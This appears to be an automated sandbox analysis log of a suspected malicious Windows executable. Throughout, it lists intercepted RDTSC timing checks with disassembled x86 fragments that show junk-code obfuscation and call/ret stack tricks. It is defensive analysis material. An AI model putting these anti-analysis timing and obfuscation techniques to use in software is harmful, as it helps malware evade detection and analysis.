Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8ED745 second address: 8ED74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EC4CA second address: 8EC4CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8ED8BC second address: 8ED8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8481503866h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EE6A8 second address: 8EE6AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF65C second address: 8EF660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EE7EB second address: 8EE800 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF660 second address: 8EF669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF669 second address: 8EF66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF66F second address: 8EF6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F8481503868h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D2A4Ch], eax 0x00000027 push 00000000h 0x00000029 or dword ptr [ebp+122D3560h], eax 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F8481503868h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b jmp 00007F848150386Ch 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jbe 00007F8481503868h 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF6DD second address: 8EF6E2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EF862 second address: 8EF874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F848150386Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F07F7 second address: 8F07FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F1627 second address: 8F162D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F162D second address: 8F1631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F26BC second address: 8F26DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F848150386Dh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jo 00007F8481503866h 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F26DC second address: 8F26E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F4808 second address: 8F480C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F6915 second address: 8F6919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F6919 second address: 8F6923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F6923 second address: 8F6927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F6927 second address: 8F692D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F692D second address: 8F6977 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743930h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F8480743936h 0x00000011 jmp 00007F848074392Eh 0x00000016 pop edx 0x00000017 jmp 00007F848074392Eh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AB066 second address: 8AB07B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F6FC5 second address: 8F7021 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F8480743926h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F8480743936h 0x00000014 nop 0x00000015 mov edi, esi 0x00000017 push 00000000h 0x00000019 mov edi, dword ptr [ebp+122D1E69h] 0x0000001f jmp 00007F8480743937h 0x00000024 push 00000000h 0x00000026 mov edi, dword ptr [ebp+122D3630h] 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e je 00007F8480743928h 0x00000034 push esi 0x00000035 pop esi 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F7021 second address: 8F702E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F8F2F second address: 8F8F4C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F848074392Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FADA5 second address: 8FADA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FADA9 second address: 8FADB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F848074392Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FADB7 second address: 8FAE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007F8481503868h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 00000018h 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F8481503868h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c mov dword ptr [ebp+122D19FDh], ebx 0x00000042 push 00000000h 0x00000044 xor dword ptr [ebp+122D26B0h], ebx 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e pushad 0x0000004f popad 0x00000050 jmp 00007F8481503876h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F815B second address: 8F81D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F848074392Fh 0x0000000a popad 0x0000000b push eax 0x0000000c jng 00007F848074392Ch 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F8480743928h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 push dword ptr fs:[00000000h] 0x0000003a adc ebx, 6B697BA1h 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 mov dword ptr [ebp+122D1EF2h], ebx 0x0000004d mov eax, dword ptr [ebp+122D156Dh] 0x00000053 mov edi, dword ptr [ebp+122D1BD2h] 0x00000059 push FFFFFFFFh 0x0000005b jmp 00007F848074392Dh 0x00000060 nop 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 push edx 0x00000065 pop edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FA004 second address: 8FA008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FAF86 second address: 8FAF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FAF8B second address: 8FAF90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FCD7C second address: 8FCD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FCD85 second address: 8FCD89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FCD89 second address: 8FCE12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F8480743928h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov ebx, edx 0x00000029 push 00000000h 0x0000002b mov edi, eax 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F8480743928h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 sub ebx, dword ptr [ebp+122D382Ch] 0x0000004f jg 00007F848074392Dh 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F848074392Ah 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FAF90 second address: 8FB029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848150386Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e jmp 00007F848150386Eh 0x00000013 pop eax 0x00000014 nop 0x00000015 mov dword ptr [ebp+122D1EE1h], ebx 0x0000001b push dword ptr fs:[00000000h] 0x00000022 mov dword ptr [ebp+12466B3Eh], eax 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007F8481503868h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 sbb bx, 36FEh 0x0000004e mov eax, dword ptr [ebp+122D0199h] 0x00000054 push 00000000h 0x00000056 push ecx 0x00000057 call 00007F8481503868h 0x0000005c pop ecx 0x0000005d mov dword ptr [esp+04h], ecx 0x00000061 add dword ptr [esp+04h], 0000001Bh 0x00000069 inc ecx 0x0000006a push ecx 0x0000006b ret 0x0000006c pop ecx 0x0000006d ret 0x0000006e push FFFFFFFFh 0x00000070 and edi, 0708B497h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b pushad 0x0000007c popad 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FB029 second address: 8FB02D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FB02D second address: 8FB033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FB033 second address: 8FB03D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FBF5F second address: 8FBF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8481503871h 0x00000009 popad 0x0000000a jmp 00007F848150386Fh 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FBF8B second address: 8FBF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FCF58 second address: 8FCF84 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F848150386Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jne 00007F8481503877h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 906153 second address: 90615D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90615D second address: 906167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 906167 second address: 90616B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90616B second address: 906180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F848150386Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 906180 second address: 906184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89D401 second address: 89D409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90587C second address: 905880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905880 second address: 905886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905886 second address: 905896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnp 00007F8480743926h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905896 second address: 90589A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905BBB second address: 905BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905BBF second address: 905BF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Dh 0x00000007 jmp 00007F848150386Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F848150386Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905BF0 second address: 905BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905BF6 second address: 905C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8481503879h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905C18 second address: 905C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905C22 second address: 905C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 905D40 second address: 905D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90B449 second address: 90B45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8481503866h 0x0000000a pop esi 0x0000000b jl 00007F848150386Ah 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90B45E second address: 90B484 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F848074392Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F8480743928h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jmp 00007F848074392Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90D702 second address: 90D714 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F8481503866h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90D714 second address: 90D71A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90D71A second address: 90D720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 914012 second address: 914025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912C71 second address: 912C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912C7A second address: 912C80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912C80 second address: 912C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913324 second address: 91332A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91332A second address: 913345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F8481503873h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913345 second address: 913369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007F8480743943h 0x0000000b jmp 00007F8480743937h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913369 second address: 913373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913373 second address: 913379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913379 second address: 91337E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91337E second address: 913389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F8480743926h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9134D0 second address: 9134E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007F8481503866h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9134E1 second address: 9134F2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8480743926h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91368A second address: 91368E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91368E second address: 913692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9137E4 second address: 913805 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F8481503866h 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 je 00007F8481503866h 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 pop esi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913ABB second address: 913AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F8480743930h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913AD2 second address: 913ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913C30 second address: 913C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89EE71 second address: 89EE76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89EE76 second address: 89EE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91D8E2 second address: 91D8F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503871h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
